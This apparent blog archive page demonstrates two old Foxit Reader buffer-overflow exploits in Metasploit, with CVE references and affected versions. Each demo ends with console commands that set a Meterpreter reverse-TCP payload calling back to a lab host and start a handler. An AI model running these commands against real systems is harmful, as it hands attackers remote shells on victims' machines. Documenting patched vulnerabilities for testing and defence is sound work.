Tag Archives: Foxit

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by rgod the 2013-01-07
Vendor public release of the vulnerability the 2013-01-14
Metasploit PoC provided the 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

EDB-ID-15532 : Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow

Timeline :

Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released new version the 2010-09-29
dookie & Sud0 exploit release on Exploit-DB the 2010-11-13
Metasploit exploit released the 2010-11-22

PoC provided by :

dookie
Sud0
corelanc0d3r
jduck

Reference(s) :

EDB-ID-15532

Affected version(s) :

Foxit PDF Reader prior to version 4.2.0.0928

Tested on Windows 7 Integral with :

Foxit PDF Reader 4.1.1.0805

Description :

This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/foxit_title_b­of
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid